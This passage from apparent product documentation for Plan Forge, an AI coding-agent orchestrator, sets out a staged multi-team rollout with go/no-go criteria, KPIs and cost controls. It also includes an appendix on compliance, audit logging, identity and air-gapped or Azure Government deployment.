- Or use the consumer-mode setup: setup.ps1 (Windows) or setup.sh (Mac/Linux) in target project
- Verify: pforge smith returns clean
Configure (1–2 hr), see Appendix L — Agent Factory Recipe Steps 2–5
- Run project-profile.prompt.md once for the pilot repo
- Run project-principles.prompt.md once
- Review and customize AGENTS.md and .github/copilot-instructions.md
- Configure .vscode/mcp.json with Plan Forge MCP server + github-mcp-server (and Foundry Toolbox if applicable)
First plan (2–3 hr including review)
- Pick a real, small feature (1–3 days' worth of human work)
- Run step0 through step5 of the pipeline
- Use pforge run-plan --estimate <plan> first to see projected cost
- Run pforge run-plan --assisted <plan> for human-in-the-loop the first time
- Compare PR diff to plan via pforge diff
Baseline metrics (30 min)
- Capture: total time spec → PR, total cost (LLM + Actions minutes), number of slices, number of gate failures, drift score
- Save to .forge/baseline-2026-05-06.json or your team's metrics store

Go/no-go criteria

Signal	Pass	Fail
First plan ran end-to-end	Yes	Stop, debug
`pforge diff` clean post-merge	Yes (drift score ≥ 80)	Plan was too vague, re-harden
Cost within 50% of estimate	Yes	Either pricing data is stale or workload differs from typical, investigate
Pilot team's reaction	"Useful, with caveats"	"Confusing" or "in the way", review configuration
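
The measurable rows of the table above can be checked mechanically. This is a minimal sketch, assuming "within 50% of estimate" means the absolute deviation is at most half the estimate; the function and field names are hypothetical and not part of Plan Forge.

```python
def cost_within_tolerance(estimate_usd: float, actual_usd: float,
                          tolerance: float = 0.5) -> bool:
    """True when actual cost deviates from the estimate by at most `tolerance`."""
    if estimate_usd <= 0:
        raise ValueError("estimate must be positive")
    return abs(actual_usd - estimate_usd) / estimate_usd <= tolerance


def day1_signals(ran_end_to_end: bool, drift_score: float,
                 estimate_usd: float, actual_usd: float) -> dict:
    """Evaluate the three measurable Day 1 signals; team reaction stays a human call."""
    return {
        "first_plan_ran": ran_end_to_end,
        "diff_clean": drift_score >= 80,  # threshold taken from the table
        "cost_ok": cost_within_tolerance(estimate_usd, actual_usd),
    }


print(day1_signals(True, 85, estimate_usd=10.0, actual_usd=13.0))
```

The deviation is treated symmetrically here: a run that costs far less than estimated also fails, since it suggests the estimate is off.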

Anti-patterns

Picking a toy feature: lessons don't scale to real work
Skipping --assisted the first time: the first plan should be observable
Running multiple plans in parallel before lessons land: waste of cost
Skipping the baseline measurement: you'll have nothing to compare against in Week 4

Week 1 — Pilot runs N plans

Goal

Pilot team runs 5+ plans, friction patterns become visible, instruction files start to encode lessons.

Activities

Daily standup adds 5 minutes for Plan Forge friction: each dev who used it that day flags one thing that didn't work
End of week: dedicated 1-hour retro
- What worked
- What didn't (be specific, instruction file, prompt, agent persona, gate, cost)
- What changed in .github/instructions/* as a result

Go/no-go criteria for Week 2

Signal	Pass	Fail
≥ 5 plans completed	Yes	Slow uptake, investigate barriers (often: fear of cost, unclear when to use vs not)
Drift score average ≥ 70	Yes	Plan-hardener prompt needs project-specific tuning
Instruction files updated ≥ 3 times	Yes	Team isn't iterating, that's the value loop, must enable it
Cost-per-PR trending down or stable	Yes	Cost going up plan-over-plan suggests waste, investigate slice sizing
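
"Trending down or stable" is easier to apply with an explicit rule. The sketch below assumes one possible definition: fit a least-squares slope to the per-plan cost series and call it stable when the slope is at most 5% of the mean cost per plan. The 5% band and all names are illustrative assumptions, not Plan Forge behavior.

```python
def trend_slope(values: list) -> float:
    """Least-squares slope of `values` against their index (0, 1, 2, ...)."""
    n = len(values)
    if n < 2:
        raise ValueError("need at least two points to compute a trend")
    mean_x = (n - 1) / 2
    mean_y = sum(values) / n
    num = sum((i - mean_x) * (v - mean_y) for i, v in enumerate(values))
    den = sum((i - mean_x) ** 2 for i in range(n))
    return num / den


def week1_signals(plans_completed: int, drift_scores: list,
                  instruction_updates: int, cost_per_pr: list,
                  stable_band: float = 0.05) -> dict:
    """Evaluate the four Week 1 signals using thresholds from the table."""
    mean_cost = sum(cost_per_pr) / len(cost_per_pr)
    return {
        "plans": plans_completed >= 5,
        "drift": sum(drift_scores) / len(drift_scores) >= 70,
        "instructions": instruction_updates >= 3,
        "cost_trend": trend_slope(cost_per_pr) <= stable_band * mean_cost,
    }


print(week1_signals(6, [80, 75, 70, 72, 78, 74], 4, [4.0, 3.0, 2.0, 1.0]))
```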

Anti-patterns

Devs using Plan Forge for everything: it's wrong for trivial bug fixes; right for plan-able work
No iteration on instructions: the value compounds via instructions; if they're untouched, the team isn't learning
Hidden cost surprises: surface costs daily, not weekly, in the first month

Week 4 — Pilot graduation, second team onboarding

Goal

Pilot team is self-sufficient. Second team starts, with patterns from Pilot 1 captured as templates. First multi-team observability dashboards live.

Activities

Pilot graduation: pilot team operates Plan Forge without daily platform-team support. Platform team transitions to "office hours" model (1 hr / week).
Second team onboard (1 work day):
- Reuses pilot team's AGENTS.md style and .github/instructions/* (forks where stack differs)
- Reuses agent routing decisions from .github/agents/ROUTING.md
- First plan runs in --assisted mode
Multi-team observability:
- Both teams' OTel data flows to the same backend
- Dashboards: per-team plan throughput, per-team cost, per-team drift scores, gate failure heatmap across teams
- Plan Forge dashboard at localhost:3100 shows per-developer; the OTel backend shows org-wide
First quarterly KPI snapshot:
- Cycle time (spec → merged PR)
- Cost per merged PR
- Plan-Forge-driven PR percentage
- Drift / regression incidents caught at gate vs. caught in production

Go/no-go criteria for Week 8

Signal	Pass	Fail
Pilot team self-sufficient	Yes	Means platform team is still bottleneck, extract patterns into docs
Team 2 ran first plan within 1 day of onboarding	Yes	Onboarding pattern needs simplification
Multi-team dashboards reflect real data	Yes	OTel pipeline issue, fix before adding more teams
Cost per merged PR vs. baseline	Trending down or stable	If up, investigate model routing and slice sizing

Anti-patterns

Onboarding team 2 before team 1 is ready to teach: copy-paste failures multiply
Letting two teams diverge on instruction files: common ground is what makes the fleet feel like a fleet
Platform team trying to operate every team's Plan Forge instance: doesn't scale; build the office-hours model early

Week 8 — 4 teams active, fleet patterns formalized

Goal

4 of 5 teams active. Shared MCP server (Foundry Toolbox or in-house) deployed. Reviewer agents are catching real issues at PR time.

Activities

Add teams 3 and 4 in parallel using the Week 4 onboarding pattern (now refined)
Deploy shared MCP server:
- For MS-shop fleets: Foundry Toolbox with curated tools (Web Search, Code Interpreter, File Search, org-specific OpenAPI tools)
- For others: in-house MCP server hosted on Azure Container Apps / AWS App Runner / similar
- Update each team's .vscode/mcp.json to consume
Reviewer agent quality pass:
- For each of the 20 ship-default agents, look at the last 30 days of comments. Are they useful? Are they being acted on? Are they firing at the right cadence?
- Tune agent personas based on findings. Document in agent file changelog.
Cost guardrails formalized:
- Per-team budget caps in .forge.json
- Cost anomaly alerts via forge_alert_triage
- Cost-per-merged-PR target set per team based on Week 4 data
Drift / quality KPIs reported to engineering leadership:
- Plan adherence (% of PRs with pforge diff clean)
- Gate failure rate (overall, per team, trend)
- Regressions caught at gate vs. in production
- Cost per merged PR (per team, trend)
- Reviewer-agent acceptance rate

Go/no-go criteria for Week 12

Signal	Pass	Fail
4 teams active and self-sufficient	Yes	Onboarding pattern still has friction; investigate
Shared MCP server reduces per-team config drift	Yes	Adoption needs nudging, show concrete value
Reviewer-agent comments acted on ≥ 30% of the time	Yes	Personas need tuning, or routing is wrong
Cost guardrails preventing runaway	Yes	Budgets ineffective, likely too high or unenforced

Anti-patterns

Adding team 5 before teams 3 and 4 are stable: compounds confusion
MCP server becomes a kitchen sink: keep it curated; resist "add every API"
Reviewer agents never tuned: they degrade over time as the codebase evolves

Week 12 — Full fleet, first quarterly review

Goal

All 5 teams active. First quarterly review of fleet metrics. Plan for next quarter.

Activities

Add team 5 using mature onboarding pattern (now ~4 hours)
Quarterly review (half-day session):
- All KPIs reviewed (cycle time, cost-per-PR, drift, gate failures, reviewer-agent value, regressions caught)
- Each team presents one win and one friction
- Patterns extracted: what worked across teams, what's team-specific
- Roadmap for next quarter: which capabilities to add, which to retire, which instruction-file patterns to standardize
Eval data flywheel (begin if not already):
- Trajectories from completed runs become demonstrations for future runs
- forge_health_trend aggregates the quarter's data
- Memory architecture (/memories/repo/) captures the institutional learning
Document the fleet operations model:
- Who runs what
- On-call rotation for fleet-level issues
- Escalation path when Plan Forge has a defect (use forge_meta_bug_file)

Go/no-go criteria for next quarter

Signal	Pass	Fail
All 5 teams operating without daily platform support	Yes	Fleet is too dependent, invest in self-service
Cost per merged PR is below baseline	Yes	Diminishing returns, investigate where time is going
Quarterly KPIs trending right direction	Yes	Hypothesis was wrong somewhere, adjust
Engineering leadership confident in scale-out to next 5 teams	Yes	Trust gap, surface what's missing

Anti-patterns

Treating quarterly review as a status update: it's a planning session, not a report
Skipping eval flywheel: trajectories are an asset; ignored, they're just storage
No documented operations model: Plan Forge becomes one person's hobby instead of a fleet capability

KPIs

The metrics that matter at the fleet level:

KPI	Source	Healthy range
Cycle time (spec → merged PR)	OTel + git history	30–70% of pre-Plan-Forge baseline
Cost per merged PR	`forge_cost_report`	Stable or declining month-over-month
Plan adherence (drift score)	`forge_diff` per plan	≥ 80% of plans clean
Gate failure rate	`forge_health_trend`	< 30%; failures should drive instruction updates
Regressions caught at gate vs. production	Bug registry + OTel	Ratio improving over time
Reviewer-agent acceptance rate	Manual sampling	≥ 30% of comments acted on
Plan Forge plans / total PRs	`forge_health_trend`	Grows over time toward team comfort level
Per-engineer cost (when implemented)	Cost service (planned)	Outliers investigated, not punished
Time-to-green per slice	OTel + slice events	Stable or improving

Cost discipline

Three habits that make cost predictable:

Always estimate before running. pforge run-plan --estimate <plan> shows projected cost across all four quorum modes (auto, power, speed, false). Look at the numbers before the spend.
Quorum mode is a knob, not a default. power (Opus + GPT-5 + Grok consensus, threshold 5) is for high-stakes architectural slices. speed (cheaper models, threshold 7) is for high-volume routine work. auto makes a per-slice judgment. false is single-model. Use them deliberately.
Watch the per-slice retry count. Slices that retry 3+ times are usually either (a) gate is broken, (b) plan was too vague, or (c) wrong model for the task. Investigate, don't just absorb.
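
The third habit is simple to automate once retry counts are available. A minimal sketch, assuming retry counts have already been extracted into a mapping of slice name to count; how they are extracted from run artifacts is not covered in this text, and the names here are hypothetical.

```python
def slices_needing_review(retry_counts: dict, threshold: int = 3) -> list:
    """Return slice names that retried `threshold` or more times, sorted by name."""
    return sorted(name for name, count in retry_counts.items() if count >= threshold)


retries = {"slice-1-schema": 0, "slice-2-api": 4, "slice-3-ui": 3, "slice-4-docs": 1}
print(slices_needing_review(retries))
```

Each flagged slice still needs a human diagnosis: broken gate, vague plan, or wrong model.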

Cost attribution

Today, Plan Forge tracks cost per plan, per slice, and per model. Per-engineer attribution is on the roadmap. Until then, the workaround is:

Each developer runs Plan Forge under their own user account
Their .forge/cost-history.json is their own ledger
Aggregate at the team level via OTel resource attributes (service.namespace, service.instance.id)

For finance teams that need formal chargeback, the OTel data is the source of truth, not the dashboard.
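
Team-level aggregation over OTel resource attributes might look like the sketch below. It assumes cost records have been exported as flat dictionaries that carry `service.namespace` (used here as the team) and a `cost_usd` field; that record shape is an assumption for illustration, not a documented Plan Forge or OTel export format.

```python
from collections import defaultdict


def cost_by_team(records: list) -> dict:
    """Sum cost per team, keyed by the `service.namespace` resource attribute."""
    totals = defaultdict(float)
    for record in records:
        totals[record["service.namespace"]] += record["cost_usd"]
    return dict(totals)


records = [
    {"service.namespace": "payments", "service.instance.id": "dev-a", "cost_usd": 1.5},
    {"service.namespace": "payments", "service.instance.id": "dev-b", "cost_usd": 2.25},
    {"service.namespace": "search", "service.instance.id": "dev-c", "cost_usd": 0.75},
]
print(cost_by_team(records))
```

Grouping by `service.instance.id` instead would give a per-developer view from the same records.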

Multi-team operations

Two patterns work; pick one and stick with it:

Pattern A: Federated (recommended for most)

Each team owns its own Plan Forge installation, instruction files, and dashboard
Platform team owns the shared MCP server, the OTel pipeline, and cross-team KPIs
Quarterly cross-team learning session

Pros: teams move at their own pace, instruction files reflect team culture, no central bottleneck.
Cons: harder to enforce org-wide patterns.

Pattern B: Centralized

Platform team owns the canonical instruction files, agent personas, and quorum presets
Teams consume from a shared .github-private/ template repo
Changes to shared assets require platform-team review

Pros: consistency across teams, easier compliance posture.
Cons: bottlenecks if platform team is small; teams may resent loss of autonomy.

The right answer depends on your engineering culture. Federated works for cultures that value team autonomy; centralized works for cultures that value consistency.

Escalation: when Plan Forge itself has a defect

Plan Forge is software. Software has bugs. The escalation path:

Self-repair first: agents can file meta-bugs against Plan Forge with forge_meta_bug_file when they encounter a defect during execution. The tool routes to the Plan Forge GitHub repo with a stable hash to deduplicate
Workaround in instruction files: if the defect is reproducible and you can route around it via instructions, do so and document the workaround
GitHub issue at srnichols/plan-forge for non-emergency defects
Pin a working version in package.json if a recent release introduced the defect; rollback is one npm install away
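
To illustrate what "a stable hash to deduplicate" can mean in the first step, here is one generic approach: normalize the volatile parts of an error message, then hash the result. This is not Plan Forge's actual algorithm, which this text does not describe; `defect_fingerprint` and its normalization rules are assumptions.

```python
import hashlib
import re


def defect_fingerprint(tool: str, message: str) -> str:
    """Hash a defect so that reports differing only in numbers or spacing collide."""
    normalized = re.sub(r"\d+", "N", message.strip().lower())  # mask volatile numbers
    normalized = re.sub(r"\s+", " ", normalized)               # collapse whitespace
    digest = hashlib.sha256(f"{tool}|{normalized}".encode("utf-8")).hexdigest()
    return digest[:16]


a = defect_fingerprint("forge_run_plan", "Timeout after 30s  on slice 4")
b = defect_fingerprint("forge_run_plan", "timeout after 45s on slice 12")
print(a == b)
```

Two reports with the same fingerprint can be attached to one issue instead of opening a second.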

Plan Forge is open source. There is no commercial support tier today. The escalation model is community + your own platform team's competence.

Common operational mistakes

Mistake	Symptom	Fix
Adding teams faster than the fleet can absorb	Inconsistent quality, cost surprises, frustrated devs	One team at a time until self-sufficient; don't compress for OKR optics
Skipping the iteration loop	Same friction in plan 50 as in plan 5	Mandate post-plan retro; encode lessons in instructions
Treating Plan Forge as "set it and forget it"	Quality degrades; agents feel stale	It's a living configuration; budget time monthly to maintain
Reviewer agents fire on everything	Humans tune them out; signal lost	Tune routing per team; advisory ≠ blocking ≠ escalation
Cost reports go unread	Surprises at month-end	Daily cost dashboard for first month, weekly thereafter
No on-call for fleet-level Plan Forge issues	One engineer is the SPOF	Document operations model; rotate ownership
Eval data ignored	Trajectories accumulate; learning doesn't compound	Review trajectories quarterly; promote useful patterns


Appendix N

Compliance and Data Residency

Where data lives, what's logged, how to export for audit, identity (today and roadmap), and the air-gapped / Azure Government deployment paths.

Audience: Security architects, compliance officers, and platform leads conducting a security review of Plan Forge.

Scope: Where data lives, what's logged, how to export for audit, identity model (today and roadmap), and the air-gapped / Azure Government deployment paths.

TL;DR for security review

Plan Forge is local-first. The orchestrator runs on the developer's machine or a CI runner inside the customer's network. There is no Plan Forge SaaS service. Source code does not leave the customer's network unless the customer chooses to call a hosted LLM (and even then, all logging stays local). The audit trail is structured, complete, and exportable. Identity is currently bearer-token only and is the largest gap on the roadmap.

Concern	Status
Source code leaves network	Only when customer-configured LLM provider is hosted; all logging stays local
Audit log of agent actions	Structured, complete, production-grade today (`telemetry.mjs`, `EVENTS.md`)
Audit log export	OTel exporter on roadmap (Week 2 of enterprise hardening); manual export available today
Identity / SSO	Bearer token only today; Entra ID / SAML / SCIM on roadmap
RBAC	None today; on roadmap
Data residency controls	Customer chooses LLM provider region; Plan Forge respects
Air-gapped deployment	Architecturally supported; documentation gap (this doc)
Encryption at rest	Customer's filesystem encryption (Plan Forge respects)
Secret redaction	Built-in for testbed findings; configurable scope on roadmap
FedRAMP / IL5 / IL6 / HIPAA / PCI / SOC2	Plan Forge is OSS; compliance posture attaches to the customer's deployment, not to a Plan Forge certification

Data flow

Five concrete data movements. For each, who handles the data and where it goes.

1. Source code

Stays in the customer's network, except for:

The bytes of files you choose to send to a hosted LLM as part of a prompt (Anthropic API, OpenAI API, GitHub Copilot, etc.)
The bytes of code Copilot Cloud Agent reads on its GitHub-hosted ephemeral runner (subject to GitHub's data handling)

If you use only on-prem inference (Foundry Local, Ollama, vLLM, llama.cpp, etc.), source code never leaves your network for any reason.

2. Plan files

Stay in the customer's repo. Plan files (docs/plans/*.md) are committed to git. They live wherever the repo lives.

3. `.forge/` artifacts

Stay on the local filesystem (developer machine or CI runner). Includes:

.forge/runs/<id>/: per-run trajectory, events, slice artifacts, summary, traces, cost history
.forge/cost-history.json: aggregate cost
.forge/telemetry/tool-calls.jsonl: MCP tool invocations
.forge/liveguard-events.jsonl: LiveGuard scan events
.forge/trajectories/<plan-slug>.jsonl: Copilot Coding Agent trajectories (when CCA is the worker)
.forge/fm-sessions/*.jsonl: Forge-Master conversation sessions

.forge/ is gitignored by default. It can be committed for audit purposes if your security policy requires.

4. Memory

Three tiers, three different residency stories:

Tier	Location	Lifetime	Notes
L1 (volatile hub)	In-process RAM	Per-process	Bounded ring buffer, evicted on restart
L2 (structured)	Local filesystem (`.forge/`, `.github/`, `docs/plans/`)	Persistent	Survives restart; lives where the repo lives
L3 (semantic via OpenBrain)	External Postgres + pgvector (optional)	Forever	Cross-project by design. If used, deploy the Postgres in your network

If L3/OpenBrain is not configured, Plan Forge runs single-project, single-session memory only. No external service required.
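
The L1 row describes a bounded ring buffer. The sketch below shows that data structure in general terms, using Python's `collections.deque` with `maxlen`; the class name `VolatileHub` is hypothetical, and Plan Forge's own hub (a Node.js process) is not shown here.

```python
from collections import deque


class VolatileHub:
    """In-memory event buffer that keeps only the most recent `capacity` events."""

    def __init__(self, capacity: int):
        if capacity <= 0:
            raise ValueError("capacity must be positive")
        self._events = deque(maxlen=capacity)  # oldest entries are evicted automatically

    def publish(self, event) -> None:
        self._events.append(event)

    def recent(self) -> list:
        return list(self._events)


hub = VolatileHub(capacity=3)
for n in range(1, 6):
    hub.publish(n)
print(hub.recent())  # [3, 4, 5]
```

Because the buffer lives in process memory, a restart empties it, which matches the "per-process" lifetime in the table.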

5. Telemetry / observability

By default, telemetry stays local in .forge/telemetry/. With the OTel exporter (Week 2 of enterprise hardening), traces and metrics are emitted in the OpenTelemetry gen_ai.* semantic-convention format to a customer-chosen OTLP endpoint. Common targets:

Splunk Observability Cloud
Datadog
Grafana Tempo / Mimir / Loki
Microsoft Application Insights (especially relevant for Foundry-attached deployments)
Honeycomb
Customer-hosted OTel Collector forwarding anywhere

The OTel exporter is off by default. Enable by setting OTEL_EXPORTER_OTLP_ENDPOINT.

Audit logging

What's logged

Plan Forge emits structured events for 38 event types across eight families. The full ebook reference, envelope, enums, payloads, retention, is Appendix V — Event Catalog; the canonical JSON schema lives in pforge-mcp/EVENTS.md. Categories include:

Plan execution lifecycle (run-started, slice-started, slice-completed, run-completed)
Worker LLM calls (model, provider, token counts, latency, cost)
MCP tool invocations (tool name, args [optional], result [optional])
Validation gate execution (gate name, result, duration)
Quorum dispatch (quorum-started, quorum-model-replied, quorum-synthesized)
LiveGuard scans (drift-, incident-, secret-scan-, dep-watch-)
Crucible smelts (idea funnel)
Tempering runs (plan hardening)
Bug registry (open, status changes)
Skill execution (start, step, complete)
Watcher events (when one project tails another)

Each event carries:

ISO8601 timestamp
Event type
Correlation ID (groups events from the same run)
Source (which subsystem emitted it)
Severity (TRACE / DEBUG / INFO / WARN / ERROR / FATAL)
Type-specific data payload
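
The six envelope fields listed above can be modeled as a small record serialized to one NDJSON line. The field names below (`ts`, `type`, `correlation_id`, `source`, `severity`, `data`) are guesses for illustration; the canonical schema is the one in pforge-mcp/EVENTS.md.

```python
import json
from dataclasses import asdict, dataclass, field

SEVERITIES = ("TRACE", "DEBUG", "INFO", "WARN", "ERROR", "FATAL")


@dataclass
class Event:
    ts: str               # ISO 8601 timestamp
    type: str             # event type, e.g. "slice-completed"
    correlation_id: str   # groups events from the same run
    source: str           # subsystem that emitted the event
    severity: str         # one of SEVERITIES
    data: dict = field(default_factory=dict)  # type-specific payload

    def __post_init__(self):
        if self.severity not in SEVERITIES:
            raise ValueError(f"unknown severity: {self.severity}")


def to_ndjson_line(event: Event) -> str:
    """Serialize to a single line with no embedded newlines, as NDJSON requires."""
    return json.dumps(asdict(event), separators=(",", ":"))


evt = Event("2026-04-01T12:00:00+00:00", "slice-completed", "run-42",
            "orchestrator", "INFO", {"slice": 3})
line = to_ndjson_line(evt)
print(line)
```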

Where it's logged

Sink	Format	Retention
`.forge/runs/<id>/events.log`	NDJSON	Per-run, kept until manual cleanup
`.forge/runs/<id>/trace.json`	OTLP-compatible	Per-run
`.forge/telemetry/tool-calls.jsonl`	NDJSON, append-only	Persistent
`.forge/liveguard-events.jsonl`	NDJSON, append-only	Persistent
Hub event stream	In-memory + WebSocket	Volatile (last N events)

How to export for audit

Today (manual):

# Aggregate all events from a date range
jq -s 'sort_by(.ts)' .forge/runs/*/events.log > audit-export.json

# Or use forge_search for filtered export
pforge search --since 2026-04-01 --sources run,liveguard,bug --output audit.json

Roadmap (Week 2 of enterprise hardening): pforge audit export --since <date> --format <json|csv> as a first-class CLI.
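
Until the first-class CLI exists, a date-bounded export can be scripted. The sketch below merges NDJSON logs and keeps events at or after a cutoff. It assumes each event has a `ts` field holding an ISO 8601 timestamp in one consistent format and timezone, so that plain string comparison orders events correctly; `merge_event_logs` is a hypothetical helper.

```python
import json
from typing import Iterable, Optional


def merge_event_logs(logs: Iterable[Iterable[str]],
                     since: Optional[str] = None) -> list:
    """Merge NDJSON logs into one list sorted by `ts`, dropping events before `since`."""
    events = []
    for log in logs:
        for line in log:
            line = line.strip()
            if not line:
                continue  # tolerate blank lines
            event = json.loads(line)
            if since is None or event["ts"] >= since:
                events.append(event)
    return sorted(events, key=lambda e: e["ts"])


run_a = ['{"ts": "2026-04-02T10:00:00Z", "type": "run-started"}', ""]
run_b = ['{"ts": "2026-03-30T09:00:00Z", "type": "slice-completed"}',
         '{"ts": "2026-04-01T08:00:00Z", "type": "run-completed"}']
exported = merge_event_logs([run_a, run_b], since="2026-04-01")
print([e["type"] for e in exported])
```

Open file objects are iterables of lines, so the same function can be fed the `events.log` file of each run directory.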

Secret redaction

Built-in for testbed findings (defect-log.mjs). High-entropy secret detection in diffs (forge_secret_scan) always redacts values; findings are masked before caching or display. Formalizing redaction as a configurable scope is planned for Week 3 (auth/RBAC scaffolding).
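
For readers unfamiliar with high-entropy detection, the general technique is to compute the Shannon entropy of long token-like strings and mask those above a threshold. The sketch below illustrates that idea only; it is not the implementation behind forge_secret_scan, and the 20-character minimum and 4.0-bit threshold are arbitrary assumptions.

```python
import math
import re
from collections import Counter

TOKEN = re.compile(r"[A-Za-z0-9+/=_\-]{20,}")  # long runs of token-like characters


def shannon_entropy(s: str) -> float:
    """Entropy in bits per character; 0.0 for empty or single-symbol strings."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def redact_high_entropy(text: str, threshold: float = 4.0) -> str:
    """Replace token-like substrings whose entropy meets the threshold."""
    def mask(match):
        token = match.group(0)
        return "[REDACTED]" if shannon_entropy(token) >= threshold else token
    return TOKEN.sub(mask, text)


print(redact_high_entropy("token: aB3dE5gH7jK9mN1pQ2rS4tU6"))
```

Entropy alone produces false positives (hashes, UUIDs) and misses short secrets, so real scanners usually combine it with known key patterns.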

Identity and authentication

Today

Plan Forge supports:

Bearer token for write operations against the dashboard / hub (configured as bridge.approvalSecret in .forge.json)
API keys loaded from environment variables or .forge/secrets.json for LLM providers (OpenAI, Anthropic, xAI, GitHub Copilot, Azure OpenAI when manually configured)

Known secrets recognized:

GITHUB_TOKEN
XAI_API_KEY
OPENAI_API_KEY
ANTHROPIC_API_KEY
OPENCLAW_API_KEY

Not yet supported as first-class:

AZURE_OPENAI_API_KEY + endpoint URL (works manually; first-class config on roadmap)
Entra ID / SAML / SCIM
OAuth flows

Identity roadmap

Order of priority based on enterprise requests:

BYO Azure OpenAI first-class (Week 3 of enterprise hardening): AZURE_OPENAI_API_KEY and endpoint as recognized secrets, deployment-name vs. model-name handled in config, Entra ID auth via azure-identity SDK
Auth model documentation + extension point (Week 3): describes how Plan Forge thinks about identity today and the planned model, and adds a clear interface for plugging in SSO providers
Config-driven RBAC scaffold (Week 3): roles, permissions, who can do what (enforcement is basic; the goal is to get the structure right)
Entra ID SSO (post-Week-4): full implementation
SAML / SCIM (later): driven by enterprise demand

If your security review requires SSO/SCIM/RBAC today, Plan Forge is not a fit. The honest answer matters more than overpromising.

Compliance posture

Plan Forge is open-source software (MIT license). Compliance certifications (FedRAMP, IL5/IL6, HIPAA, PCI-DSS, SOC2) attach to the customer's deployment of Plan Forge, not to Plan Forge itself. There is no Plan Forge SaaS to certify.

Even so, several Plan Forge architectural choices are friendly to compliance audits:

Posture	What helps
No SaaS data plane	Nothing to subpoena from a vendor; data lives where you put it
Structured audit trail	Every action logged with timestamps, correlation IDs, severity
Open source	Auditable end-to-end; no proprietary closed binaries
Local-first by default	Air-gapped deployment is structurally possible (see below)
Open standards	AGENTS.md, MCP, OTel `gen_ai.*`, no proprietary lock-in to challenge
Compliance reviewer agent	`.github/agents/compliance-reviewer.agent.md` ships out of the box for GDPR/CCPA/SOC2/HIPAA-aware code review
Project profile compliance frameworks	`.github/prompts/project-profile.prompt.md` collects SOC2, HIPAA, PCI-DSS, GDPR, FedRAMP early in setup

For specific frameworks:

SOC2 Type II

Audit trail completeness: ✓ (events, traces, run artifacts)
Access controls: ⚠ (bearer token today; SSO/RBAC on roadmap)
Change management: ✓ (git-based plan files, scope contracts, gates)
Encryption in transit: ✓ for LLM API calls; ✓ for OTel export when configured with TLS
Encryption at rest: customer's filesystem encryption

HIPAA

BAA: not applicable (no Plan Forge SaaS to BAA)
Customer's BAA with their LLM provider applies to inference data
Audit log: structured and complete
PHI handling: customer's responsibility, Plan Forge does not pre-process content

PCI-DSS

Scope reduction: Plan Forge does not handle payment data unless customer-configured to read it. Recommend isolating any PCI-relevant code review to dedicated Plan Forge instances with strict secret scanning enabled.
Secret handling: built-in detection + redaction for high-entropy strings in diffs

FedRAMP / IL5 / IL6

Plan Forge is deployable in Azure Government and on-prem environments that match FedRAMP / IL boundaries
Use only FedRAMP-authorized LLM providers (Azure OpenAI in Azure Government has FedRAMP-authorized models: gpt-5.1, gpt-4.1, o3-mini, gpt-4o)
Plan Forge itself does not require FedRAMP authorization (it's software you run, not a service you consume)

GDPR

Data minimization: Plan Forge does not collect personal data unless customer-configured
Right to access / delete: applies to data the customer chooses to capture; .forge/ artifacts are deletable

Air-gapped deployment

Plan Forge is architecturally compatible with fully air-gapped deployment. The complete pattern:

What works air-gapped

Plan Forge orchestrator (Node.js process; no inbound network calls required)
Dashboard (localhost:3100)
Plan execution against local repos
All .forge/ artifact storage
L1 (in-memory) and L2 (filesystem) memory tiers
OTel export to in-network OTel collector
Validation gates (run locally as shell commands)

What requires special handling air-gapped

Component	Air-gapped solution
LLM inference	Use Foundry Local powered by Azure Local (preview May 2026), Ollama, vLLM, llama.cpp, or similar on-prem inference. Configure as the OpenAI-compatible endpoint Plan Forge talks to.
GitHub Enterprise	Use GitHub Enterprise Server (GHES) instead of GitHub.com. Plan Forge supports GHES; Cloud Agent local-MCP-server pattern works
Update checks	Set `PFORGE_NO_UPDATE_CHECK=1` to disable. Manual updates via `pforge self-update --from-local <path>` or repo sync from internal mirror
OpenBrain L3 memory	Optional; if used, deploy the Postgres+pgvector inside the boundary
MCP servers	Self-host any MCP server you want available; point `.vscode/mcp.json` at internal endpoints only

What does NOT work air-gapped

Plan Forge Hub WebSocket connections to external observability (configure local OTel collector instead)
Any LLM provider that requires public internet (configure on-prem inference instead)
The community extensions catalog (use pforge ext add --from-local <path> for vetted extensions)

Deployment checklist for air-gap

On-prem LLM inference deployed (Foundry Local / Ollama / vLLM)
GHES instead of GitHub.com (or no GitHub at all if your VCS is internal)
Internal git mirror for srnichols/plan-forge updates
OTel collector inside the boundary
OpenBrain (if using L3 memory) deployed inside the boundary
All MCP server endpoints internal
PFORGE_NO_UPDATE_CHECK=1 set
Network egress audit confirms zero outbound to public internet
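
The "all MCP server endpoints internal" item can be spot-checked before the network egress audit. A minimal sketch, assuming the config uses the `mcpServers` map shown in Appendix L and that internal hosts share known DNS suffixes; `corp.example` and the helper name are placeholders.

```python
from urllib.parse import urlparse


def external_endpoints(config: dict, internal_suffixes: list) -> list:
    """Return names of MCP servers whose URL host is outside the given suffixes."""
    offenders = []
    for name, entry in config.get("mcpServers", {}).items():
        url = entry.get("url")
        if url is None:
            continue  # command-based entries have no URL to check here
        host = urlparse(url).hostname or ""
        if not any(host == s or host.endswith("." + s) for s in internal_suffixes):
            offenders.append(name)
    return sorted(offenders)


config = {
    "mcpServers": {
        "plan-forge": {"command": "node", "args": ["./pforge-mcp/server.mjs"]},
        "github": {"url": "https://api.githubcopilot.com/mcp/", "auth": "oauth"},
        "tools": {"url": "https://mcp.corp.example/mcp"},
    }
}
print(external_endpoints(config, ["corp.example"]))  # ['github']
```

This checks configuration only; it does not replace the egress audit, since a locally launched server can still make outbound calls.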

This is the differentiator vs. competitors. Cursor cannot offer this (control plane in AWS even with self-hosted workers). Sourcegraph Amp explicitly cannot (no self-host, no BYOK). GitHub Copilot Cloud Agent runs on GitHub-hosted infrastructure. For air-gapped requirements, Plan Forge is structurally the only viable option in the comparison set.

Azure Government

For customers deploying in Azure Government:

What works

Plan Forge orchestrator running on Azure Government VMs / AKS / Functions
Azure OpenAI in Azure Government as the LLM provider
Endpoint domain: openai.azure.us (not openai.azure.com)
Auth: login.microsoftonline.us Entra ID (when first-class Entra support lands)
Today: API key auth works via the manually-configured Azure OpenAI path

Model availability

Azure Government has a substantially smaller catalog than commercial Azure:

gpt-5.1
gpt-4.1
gpt-4.1-mini
o3-mini
gpt-4o
Embeddings: text-embedding-3-large, text-embedding-3-small, text-embedding-ada-002

Available in usgovarizona and usgovvirginia, with Data Zone Standard and Provisioned variants.

Plan Forge implications

The default power quorum preset (which assumes flagship models like gpt-5.5 or claude-opus-4.7) won't resolve cleanly
Use a power-gov preset (planned) or graceful fallback
